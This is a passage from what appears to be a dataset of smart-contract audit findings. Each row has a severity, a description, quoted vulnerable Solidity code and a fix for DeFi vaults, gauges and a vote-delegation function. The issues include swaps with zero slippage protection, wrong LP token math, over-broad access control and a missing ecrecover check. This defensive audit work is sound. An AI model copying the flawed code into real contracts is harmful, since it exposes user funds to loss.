nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n\\nAlthough some strategies may manage stablecoin <-> stablecoin swaps that typically would incur low slippage, large size trades could still suffer from low on-chain liquidity and end up getting frontrun and “sandwiched” by MEV bots or other actors, thereby extracting maximum amount from the strategy vault swaps as slippage permits. This could be especially significant during vaults' settlements, that can be initiated by anyone, as lending currencies may be swapped in large batches and not do it on a per-account basis. For example with the CrossCurrencyfCash vault, it can only enter settlement if all strategy tokens (lending currency in this case) are gone and swapped back into the borrow currency:\\n```\\nif (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n}\\n```\\n\\nAs a result, in addition to the risk of stablecoins' getting off-peg, unfavorable market liquidity conditions and arbitrage-seeking actors could eat into the profits generated by this strategy as per the maximum allowed slippage. However, during settlement the strategy vaults don't have the luxury of waiting for the right conditions to perform the trade as the borrows need to repaid at their maturities.\\nSo, the profitability of the vaults, and therefore users, could suffer due to potential low market liquidity allowing high slippage and risks of being frontrun with the chosen strategy vaults' currencies.",Ensure that the currencies chosen to generate yield in the strategy vaults have sufficient market liquidity on exchanges allowing for low slippage swaps.,,"```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n" +ConvexPositionHandler._claimRewards incorrectly calculates amount of LP tokens to unstake,high,"`ConvexPositionHandler._claimRewards` is an internal function that harvests Convex reward tokens and takes the generated yield in ETH out of the Curve pool by calculating the difference in LP token price. To do so, it receives the current share price of the curve LP tokens and compares it to the last one stored in the contract during the last rewards claim. The difference in share price is then multiplied by the LP token balance to get the ETH yield via the `yieldEarned` variable:\\n```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n\\nHowever, to receive this ETH yield, LP tokens need to be unstaked from the Convex pool and then converted via the Curve pool. To do this, the contract introduces lpTokenEarned:\\n```\\nuint256 lpTokenEarned = yieldEarned / NORMALIZATION\\_FACTOR; // 18 decimal from virtual price\\n```\\n\\nThis calculation is incorrect. It uses yieldEarned which is denominated in ETH and simply divides it by the normalization factor to get the correct number of decimals, which still returns back an amount denominated in ETH, whereas an amount denominated in LP tokens should be returned instead.\\nThis could lead to significant accounting issues including losses in the “no-loss” parts of the vault's strategy as 1 LP token is almost always guaranteed to be worth more than 1 ETH. So, when the intention is to withdraw `X` ETH worth of an LP token, withdrawing `X` LP tokens will actually withdraw `Y` ETH worth of an LP token, where `Y>X`. As a result, less than expected ETH will remain in the Convex handler part of the vault, and the ETH yield will go to the Lyra options, which are much riskier. In the event Lyra options don't work out and there is more ETH withdrawn than expected, there is a possibility that this would result in a loss for the vault.","The fix is straightforward and that is to calculate `lpTokenEarned` using the `currentSharePrice` already received from the Curve pool. That way, it is the amount of LP tokens that will be sent to be unwrapped and unstaked from the Convex and Curve pools. This will also take care of the normalization factor. `uint256 `lpTokenEarned` = yieldEarned / currentSharePrice;`",,```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n +The WETH tokens are not taken into account in the ConvexTradeExecutor.totalFunds function,high,"The `totalFunds` function of every executor should include all the funds that belong to the contract:\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\nThe `ConvexTradeExecutor` uses this function for calculations:\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\n```\\nfunction \\_getTotalBalancesInETH(bool useVirtualPrice)\\n internal\\n view\\n returns (\\n uint256 stakedLpBalance,\\n uint256 lpTokenBalance,\\n uint256 ethBalance\\n )\\n{\\n uint256 stakedLpBalanceRaw = baseRewardPool.balanceOf(address(this));\\n uint256 lpTokenBalanceRaw = lpToken.balanceOf(address(this));\\n\\n uint256 totalLpBalance = stakedLpBalanceRaw + lpTokenBalanceRaw;\\n\\n // Here, in order to prevent price manipulation attacks via curve pools,\\n // When getting total position value -> its calculated based on virtual price\\n // During withdrawal -> calc\\_withdraw\\_one\\_coin() is used to get an actual estimate of ETH received if we were to remove liquidity\\n // The following checks account for this\\n uint256 totalLpBalanceInETH = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(totalLpBalance)\\n : \\_lpTokenValueInETH(totalLpBalance);\\n\\n lpTokenBalance = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(lpTokenBalanceRaw)\\n : \\_lpTokenValueInETH(lpTokenBalanceRaw);\\n\\n stakedLpBalance = totalLpBalanceInETH - lpTokenBalance;\\n ethBalance = address(this).balance;\\n}\\n```\\n\\nThis function includes ETH balance, LP balance, and staked balance. But WETH balance is not included here. WETH tokens are initially transferred to the contract, and before the withdrawal, the contract also stores WETH.",Include WETH balance into the `totalFunds`.,,"```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n" +LyraPositionHandlerL2 inaccurate modifier onlyAuthorized may lead to funds loss if keeper is compromised,medium,"The `LyraPositionHandlerL2` contract is operated either by the L2 keeper or by the L1 `LyraPositionHandler` via the `L2CrossDomainMessenger`. This is implemented through the `onlyAuthorized` modifier:\\n```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n ""ONLY\\_AUTHORIZED""\\n );\\n \\_;\\n}\\n```\\n\\nThis is set on:\\n`withdraw()`\\n`openPosition()`\\n`closePosition()`\\n`setSlippage()`\\n`deposit()`\\n`sweep()`\\n`setSocketRegistry()`\\n`setKeeper()`\\nFunctions 1-3 have a corresponding implementation on the L1 `LyraPositionHandler`, so they could indeed be called by it with the right parameters. However, 4-8 do not have an implemented way to call them from L1, and this modifier creates an unnecessarily expanded list of authorised entities that can call them.\\nAdditionally, even if their implementation is provided, it needs to be done carefully because `msg.sender` in their case is going to end up being the `L2CrossDomainMessenger`. For example, the `sweep()` function sends any specified token to `msg.sender`, with the intention likely being that the recipient is under the team's or the governance's control - yet, it will be `L2CrossDomainMessenger` and the tokens will likely be lost forever instead.\\nOn the other hand, the `setKeeper()` function would need a way to be called by something other than the keeper because it is intended to change the keeper itself. In the event that the access to the L2 keeper is compromised, and the L1 `LyraPositionHandler` has no way to call `setKeeper()` on the `LyraPositionHandlerL2`, the whole contract and its funds will be compromised as well. So, there needs to be some way to at least call the `setKeeper()` by something other than the keeper to ensure security of the funds on L2.\\n```\\nfunction closePosition(bool toSettle) public override onlyAuthorized {\\n LyraController.\\_closePosition(toSettle);\\n UniswapV3Controller.\\_estimateAndSwap(\\n false,\\n LyraController.sUSD.balanceOf(address(this))\\n );\\n}\\n\\n/\\*///////////////////////////////////////////////////////////////\\n MAINTAINANCE FUNCTIONS\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/// @notice Sweep tokens\\n/// @param \\_token Address of the token to sweepr\\nfunction sweep(address \\_token) public override onlyAuthorized {\\n IERC20(\\_token).transfer(\\n msg.sender,\\n IERC20(\\_token).balanceOf(address(this))\\n );\\n}\\n\\n/// @notice socket registry setter\\n/// @param \\_socketRegistry new address of socket registry\\nfunction setSocketRegistry(address \\_socketRegistry) public onlyAuthorized {\\n socketRegistry = \\_socketRegistry;\\n}\\n\\n/// @notice keeper setter\\n/// @param \\_keeper new keeper address\\nfunction setKeeper(address \\_keeper) public onlyAuthorized {\\n keeper = \\_keeper;\\n}\\n```\\n","Create an additional modifier for functions intended to be called just by the keeper (onlyKeeper) such as functions 4-7, and create an additional modifier `onlyGovernance` for the `setKeeper()` function. As an example, the L1 `Vault` contract also has a `setKeeper()` function that has a `onlyGovernance()` modifier. Please note that this will likely require implementing a function for the system's governance that can call `LyraPositionHandlerL2.setKeeper()` via the `L2CrossDomainMessenger`.",,"```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n ""ONLY\\_AUTHORIZED""\\n );\\n \\_;\\n}\\n```\\n" +Harvester.harvest swaps have no slippage parameters,medium,"As part of the vault strategy, all reward tokens for staking in the Convex ETH-stETH pool are claimed and swapped into ETH. The swaps for these tokens are done with no slippage at the moment, i.e. the expected output amount for all of them is given as 0.\\nIn particular, one reward token that is most susceptible to slippage is LDO, and its swap is implemented through the Uniswap router:\\n```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n\\nThe swap is called with `amountOutMinimum: 0`, meaning that there is no slippage protection in this swap. This could result in a significant loss of yield from this reward as MEV bots could “sandwich” this swap by manipulating the price before this transaction and immediately reversing their action after the transaction, profiting at the expense of our swap. Moreover, the Uniswap pools seem to have low liquidity for the LDO token as opposed to Balancer or Sushiswap, further magnifying slippage issues and susceptibility to frontrunning.\\nThe other two tokens - CVX and CRV - are being swapped through their Curve pools, which have higher liquidity and are less susceptible to slippage. Nonetheless, MEV strategies have been getting more advanced and calling these swaps with 0 as expected output may place these transactions in danger of being frontrun and “sandwiched” as well.\\n```\\nif (cvxBalance > 0) {\\n cvxeth.exchange(1, 0, cvxBalance, 0, false);\\n}\\n// swap CRV to WETH\\nif (crvBalance > 0) {\\n crveth.exchange(1, 0, crvBalance, 0, false);\\n}\\n```\\n\\nIn these calls `.exchange` , the last `0` is the `min_dy` argument in the Curve pools swap functions that represents the minimum expected amount of tokens received after the swap, which is `0` in our case.",Introduce some slippage parameters into the swaps.,,"```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n" +Harvester.rewardTokens doesn't account for LDO tokens,medium,"As part of the vault's strategy, the reward tokens for participating in Curve's ETH-stETH pool and Convex staking are claimed and swapped for ETH. This is done by having the `ConvexPositionHandler` contract call the reward claims API from Convex via `baseRewardPool.getReward()`, which transfers the reward tokens to the handler's address. Then, the tokens are iterated through and sent to the harvester to be swapped from `ConvexPositionHandler` by getting their list from `harvester.rewardTokens()` and calling `harvester.harvest()`\\n```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n\\nHowever, `harvester.rewardTokens()` doesn't have the LDO token's address in its list, so they will not be transferred to the harvester to be swapped.\\n```\\nfunction rewardTokens() external pure override returns (address[] memory) {\\n address[] memory rewards = new address[](2);\\n rewards[0] = address(crv);\\n rewards[1] = address(cvx);\\n return rewards;\\n}\\n```\\n\\nAs a result, `harvester.harvest()` will not be able to execute its `_swapLidoForWETH()` function since its `ldoBalance` will be 0. This results in missed rewards and therefore yield for the vault as part of its normal flow.\\nThere is a possible mitigation in the current state of the contract that would require governance to call `sweep()` on the LDO balance from the `BaseTradeExecutor` contract (that `ConvexPositionHandler` inherits) and then transferring those LDO tokens to the harvester contract to perform the swap at a later rewards claim. This, however, requires transactions separate from the intended flow of the system as well as governance intervention.",Add the LDO token address to the `rewardTokens()` function by adding the following line `rewards[2] = address(ldo);`,,"```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n" +Keeper design complexity,medium,"The current design of the protocol relies on the keeper being operated correctly in a complex manner. Since the offchain code for the keeper wasn't in scope of this audit, the following is a commentary on the complexity of the keeper operations in the context of the contracts. Keeper logic such as the order of operations and function argument parameters with log querying are some examples where if the keeper doesn't execute them correctly, there may be inconsistencies and issues with accounting of vault shares and vault funds resulting in unexpected behaviour. While it may represent little risk or issues to the current Brahma-fi team as the vault is recently live, the keeper logic and exact steps should be well documented so that public keepers (if and when they are enabled) can execute the logic securely and future iterations of the vault code can account for any intricacies of the keeper logic.\\n1. Order of operations: Convex rewards & new depositors profiting at the expense of old depositors' yielded reward tokens. As part of the vault's strategy, the depositors' ETH is provided to Curve and the LP tokens are staked in Convex, which yield rewards such as CRV, CVX, and LDO tokens. As new depositors provide their ETH, the vault shares minted for their deposits will be less compared to old deposits as they account for the increasing value of LP tokens staked in these pools. In other words, if the first depositor provides 1 ETH, then when a new depositor provides 1 ETH much later, the new depositor will get less shares back as the `totalVaultFunds()` will increase:\\n```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n\\n```\\nfunction totalVaultFunds() public view returns (uint256) {\\n return\\n IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds();\\n}\\n```\\n\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\nHowever, this does not account for the reward tokens yielded throughout that time. From the smart contract logic alone, there is no requirement to first execute the reward token harvest. It is up to the keeper to execute `ConvexTradeExecutor.claimRewards` in order to claim and swap their rewards into ETH, which only then will be included into the yield in the above `ConvexPositionHandler.positionInWantToken` function. If this is not done prior to processing new deposits and minting new shares, new depositors would unfairly benefit from the reward tokens' yield that was generated before they deposited but accounted for in the vault funds only after they deposited.\\n2. Order of operations: closing Lyra options before processing new deposits.\\nThe other part of the vault's strategy is utilising the yield from Convex to purchase options from Lyra on Optimism. While Lyra options are risky and can become worthless in the event of bad trades, only yield is used for them, therefore keeping user deposits' initial value safe. However, their value could also yield significant returns, increasing the overall funds of the vault. Just as with `ConvexTradeExecutor`, `LyraTradeExecutor` also has a `totalFunds()` function that feeds into the vault's `totalVaultFunds()` function. In Lyra's case, however, it is a manually set value by the keeper that is supposed to represent the value of Lyra L2 options:\\n```\\nfunction totalFunds()\\n public\\n view\\n override\\n returns (uint256 posValue, uint256 lastUpdatedBlock)\\n{\\n return (\\n positionInWantToken.posValue +\\n IERC20(vaultWantToken()).balanceOf(address(this)),\\n positionInWantToken.lastUpdatedBlock\\n );\\n}\\n```\\n\\n```\\nfunction setPosValue(uint256 \\_posValue) public onlyKeeper {\\n LyraPositionHandler.\\_setPosValue(\\_posValue);\\n}\\n```\\n\\n```\\nfunction \\_setPosValue(uint256 \\_posValue) internal {\\n positionInWantToken.posValue = \\_posValue;\\n positionInWantToken.lastUpdatedBlock = block.number;\\n}\\n```\\n\\nSolely from the smart contract logic, there is a possibility that a user deposits when Lyra options are valued high, meaning the total vault funds are high as well, thus decreasing the amount of shares the user would have received if it weren't for the Lyra options' value. Consequently, if after the deposit the Lyra options become worthless, decreasing the total vault funds, the user's newly minted shares will now represent less than what they have deposited.\\nWhile this is not currently mitigated by smart contract logic, it may be worked around by the keeper first settling and closing all Lyra options and transferring all their yielded value in ETH, if any, to the Convex trade executor. Only then the keeper would process new deposits and mint new shares. This order of operations is critical to maintain the vault's intended safe strategy of maintaining the user's deposited value, and is dependent entirely on the keeper offchain logic.\\n3. Order of operations: additional trade executors and their specific management Similarly to the above examples, as more trade executors and position handlers are added to the vault, the complexity for the keeper will go up significantly, requiring it to maintain all correct orders of operations not just to keep the shares and funds accounting intact, but simply for the trade executors to function normally. For example, in the case of Lyra, the keepers need to manually call `confirmDeposit` and `confirmWithdraw` to update their `depositStatus` and `withdrawalStatus` respectively to continue normal operations or otherwise new deposits and withdrawals wouldn't be processed. On the other hand, the Convex executor does it automatically. Due to the system design, there may be no single standard way to handle a trade executor. New executors may also require specific calls to be done manually, increasing overall complexity keeper logic to support the system.\\n4. Keeper calls & arguments: depositFunds/batchDeposit and initiateWithdrawal/batchWithdraw `userAddresses[]` array + gas overhead With the current gated approach and batching for deposits and withdrawals to and from the vault, users aren't able to directly mint and redeem their vault shares. Instead, they interact with the `Batcher` contract that then communicates with the `Vault` contract with the help of the keeper. However, while each user's deposit and withdrawal amounts are registered in the contract state variables such as `depositLedger[user]` and `withdrawLedger[user]`, and there is an event emitted with the user address and their action, to process them the keeper is required to keep track of all the user addresses in the batch they need to process. In particular, the keeper needs to provide `address[] memory users` for both `batchDeposit()` and `batchWithdraw()` functions that communicate with the vault. There is no stored list of users within the contract that could provide or verify the right users, so it is entirely up to the keeper's offchain logic to query the logs and retrieve the addresses required. Therefore, depending on the size of the `address[] memory users` array, the keepers may need to consider the transaction gas limit, possibly requiring splitting the array up and doing several transactions to process all of them. In addition, in the event of withdrawals, the keepers need to calculate how much of the `wantToken` (WETH in our case) will be required to process the withdrawals, and call `withdrawFromExecutor()` with that amount to provide enough assets to cover withdrawals from the vault.\\n5. Timing: 50 block radius for updates on trade executors that need to have their values updated via a call Some trade executors, like the Convex one, can retrieve their funds value at any time from Layer 1, thereby always being up to date with the current block. Others, like the Lyra trade executor, require the keeper to update their position value by initiating a call, which also updates their `positionInWantToken.lastUpdatedBlock` state variable. However, this variable is also called during during the vault.totalVaultFunds()call during deposits and withdrawals via `totalExecutorFunds()`, which eventually calls `areFundsUpdated(blockUpdated)`. This is a check to ensure that the current transaction's `block.number <= _blockUpdated + BLOCK_LIMIT`, where BLOCK_LIMIT=50 blocks, i.e. roughly 12-15 min. As a result, keepers need to make sure that all executors that require a call for this have their position values updated before and rather close to processing and deposits or withdrawals, or `areFundsUpdated()` will revert those calls.","Document the exact order of operations, steps, necessary logs and parameters that keepers need to keep track of in order for the vault strategy to succeed.",,```\\nshares = totalSupply() > 0\\n ? (totalSupply() \\* amountIn) / totalVaultFunds()\\n : amountIn;\\n```\\n +Approving MAX_UINT amount of ERC20 tokens,low,"Approving the maximum value of uint256 is a known practice to save gas. However, this pattern was proven to increase the impact of an attack many times in the past, in case the approved contract gets hacked.\\n```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n\\n```\\nIERC20(vaultInfo.tokenAddress).approve(vaultAddress, type(uint256).max);\\n```\\n\\n```\\nIERC20(LP\\_TOKEN).safeApprove(ETH\\_STETH\\_POOL, type(uint256).max);\\n\\n// Approve max LP tokens to convex booster\\nIERC20(LP\\_TOKEN).safeApprove(\\n address(CONVEX\\_BOOSTER),\\n type(uint256).max\\n);\\n```\\n\\n```\\ncrv.safeApprove(address(crveth), type(uint256).max);\\n// max approve CVX to CVX/ETH pool on curve\\ncvx.safeApprove(address(cvxeth), type(uint256).max);\\n// max approve LDO to uniswap swap router\\nldo.safeApprove(address(uniswapRouter), type(uint256).max);\\n```\\n\\n```\\nIERC20(wantTokenL2).safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n// approve max susd balance to uniV3 router\\nLyraController.sUSD.safeApprove(\\n address(UniswapV3Controller.uniswapRouter),\\n type(uint256).max\\n);\\n```\\n","Consider approving the exact amount that's needed to be transferred, or alternatively, add an external function that allows the revocation of approvals.",,"```\\nIERC20(vaultWantToken()).approve(vault, MAX\\_INT);\\n```\\n" +Batcher.depositFunds may allow for more deposits than vaultInfo.maxAmount,low,"As part of a gradual rollout strategy, the Brahma-fi system of contracts has a limit of how much can be deposited into the protocol. This is implemented through the `Batcher` contract that allows users to deposit into it and keep the amount they have deposited in the `depositLedger[recipient]` state variable. In order to cap how much is deposited, the user's input `amountIn` is evaluated within the following statement:\\n```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n ""MAX\\_LIMIT\\_EXCEEDED""\\n);\\n```\\n\\nHowever, while `pendingDeposit`, `amountIn`, and `vaultInfo.maxAmount` are denominated in the vault asset token (WETH in our case), `IERC20(vaultInfo.vaultAddress).totalSupply()` and `pendingWithdrawal` represent vault shares tokens, creating potential mismatches in this evaluation.\\nAs the yield brings in more and more funds to the vault, the amount of share minted for each token deposited in decreases, so `totalSupply()` becomes less than the total deposited amount (not just vault funds) as the strategy succeeds over time. For example, at first `X` deposited tokens would mint `X` shares. After some time, this would create additional funds in the vault through yield, and another `X` deposit of tokens would mint less than `X` shares, say `X-Y`, where `Y` is some number greater than 0 representing the difference in the number of shares minted. So, while there were `2*X` deposited tokens, `totalSupply()=(2*X-Y)` shares would have been minted in total. However, at the time of the next deposit, a user's `amountIn` will be added with `totalSupply()=(2*X-Y)` number of shares instead of a greater `2*X` number of deposited tokens. So, this will undershoot the actual amount of tokens deposited after this user's deposit, thus potentially evaluating it less than `maxAmount`, and letting more user deposits get inside the vault than what was intended.",Consider either documenting this potential discrepancy or keeping track of all deposits in a state variable and using that inside the `require` statement..,,"```\\nrequire(\\n IERC20(vaultInfo.vaultAddress).totalSupply() +\\n pendingDeposit -\\n pendingWithdrawal +\\n amountIn <=\\n vaultInfo.maxAmount,\\n ""MAX\\_LIMIT\\_EXCEEDED""\\n);\\n```\\n" +BaseTradeExecutor.confirmDeposit | confirmWithdraw - Violation of the “checks-effects-interactions” pattern,low,"Both `confirmDeposit, confirmWithdraw` might be re-entered by the keeper (in case it is a contract), in case the derived contract allows the execution of untrusted code.\\n```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, ""DEPOSIT\\_COMPLETED"");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n\\n```\\nfunction confirmWithdraw() public override onlyKeeper {\\n require(withdrawalStatus.inProcess, ""WIHDRW\\_COMPLETED"");\\n \\_confirmWithdraw();\\n withdrawalStatus.inProcess = false;\\n}\\n```\\n","Although the impact is very limited, it is recommended to implement the “checks-effects-interactions” in both functions.",,"```\\nfunction confirmDeposit() public override onlyKeeper {\\n require(depositStatus.inProcess, ""DEPOSIT\\_COMPLETED"");\\n \\_confirmDeposit();\\n depositStatus.inProcess = false;\\n}\\n```\\n" +Reactivated gauges can't queue up rewards,high,"Active gauges as set in `ERC20Gauges.addGauge()` function by authorised users get their rewards queued up in the `FlywheelGaugeRewards._queueRewards()` function. As part of it, their associated struct `QueuedRewards` updates its `storedCycle` value to the cycle in which they get queued up:\\n```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n\\nHowever, these gauges may be deactivated in `ERC20Gauges.removeGauge()`, and they will now be ignored in either `FlywheelGaugeRewards.queueRewardsForCycle()` or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()` because both use `gaugeToken.gauges()` to get the set of gauges for which to queue up rewards for the cycle, and that only gives active gauges. Therefore, any updates `FlywheelGaugeRewards` makes to its state will not be done to deactivated gauges' `QueuedRewards` structs. In particular, the `gaugeCycle` contract state variable will keep advancing throughout its cycles, while `QueuedRewards.storedCycle` will retain its previously set value, which is the cycle where it was queued and not 0.\\nOnce reactivated later with at least 1 full cycle being done without it, it will produce issues. It will now be returned by `gaugeToken.gauges()` to be processed in either FlywheelGaugeRewards.queueRewardsForCycle()or `FlywheelGaugeRewards.queueRewardsForCyclePaginated()`, but, once the reactivated gauge is passed to `_queueRewards()`, it will fail an assert:\\n```\\nassert(queuedRewards.storedCycle == 0 || queuedRewards.storedCycle >= lastCycle);\\n```\\n\\nThis is because it already has a set value from the cycle it was processed in previously (i.e. storedCycle>0), and, since that cycle is at least 1 full cycle behind the state contract, it will also not pass the second condition `queuedRewards.storedCycle >= lastCycle`.\\nThe result is that this gauge is locked out of queuing up for rewards because `queuedRewards.storedCycle` is only synchronised with the contract's cycle later in `_queueRewards()` which will now always fail for this gauge.","Account for the reactivated gauges that previously went through the rewards queue process, such as introducing a separate flow for newly activated gauges. However, any changes such as removing the above mentioned `assert()` should be carefully validated for other downstream logic that may use the `QueuedRewards.storedCycle` value. Therefore, it is recommended to review the state transitions as opposed to only passing this specific check.",,"```\\ngaugeQueuedRewards[gauge] = QueuedRewards({\\n priorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n cycleRewards: uint112(nextRewards),\\n storedCycle: currentCycle\\n});\\n```\\n" +Reactivated gauges have incorrect accounting for the last cycle's rewards,medium,"As described in https://github.com/ConsenSysDiligence/fei-labs-audit-2022-04/issues/3, reactivated gauges that previously had queued up rewards have a mismatch between their `storedCycle` and contract's `gaugeCycle` state variable.\\nDue to this mismatch, there is also a resulting issue with the accounting logic for its completed rewards:\\n```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n\\nConsequently, this then produces an incorrect value for QueuedRewards.priorCycleRewards:\\n```\\npriorCycleRewards: queuedRewards.priorCycleRewards + completedRewards,\\n```\\n\\nAs now `completedRewards` will be equal to 0 instead of the previous cycle's rewards for that gauge. This may cause a loss of rewards accounted for this gauge as this value is later used in `getAccruedRewards()`.","Consider changing the logic of the check so that `storedCycle` values further in the past than `lastCycle` may produce the right rewards return for this expression, such as using `<=` instead of `==` and adding an explicit check for `storedCycle` `==` 0 to account for the initial scenario.",,```\\nuint112 completedRewards = queuedRewards.storedCycle == lastCycle ? queuedRewards.cycleRewards : 0;\\n```\\n +Lack of input validation in delegateBySig,low,"```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, ""ERC20MultiVotes: signature expired"");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR(),\\n keccak256(abi.encode(DELEGATION\\_TYPEHASH, delegatee, nonce, expiry))\\n )\\n ),\\n v,\\n r,\\n s\\n );\\n require(nonce == nonces[signer]++, ""ERC20MultiVotes: invalid nonce"");\\n \\_delegate(signer, delegatee);\\n}\\n```\\n",Introduce a zero address check i.e `require signer!=address(0)` and check if the recovered signer is an expected address. Refer to ERC20's permit for inspiration.,,"```\\nfunction delegateBySig(\\n address delegatee,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n) public {\\n require(block.timestamp <= expiry, ""ERC20MultiVotes: signature expired"");\\n address signer = ecrecover(\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR(),\\n 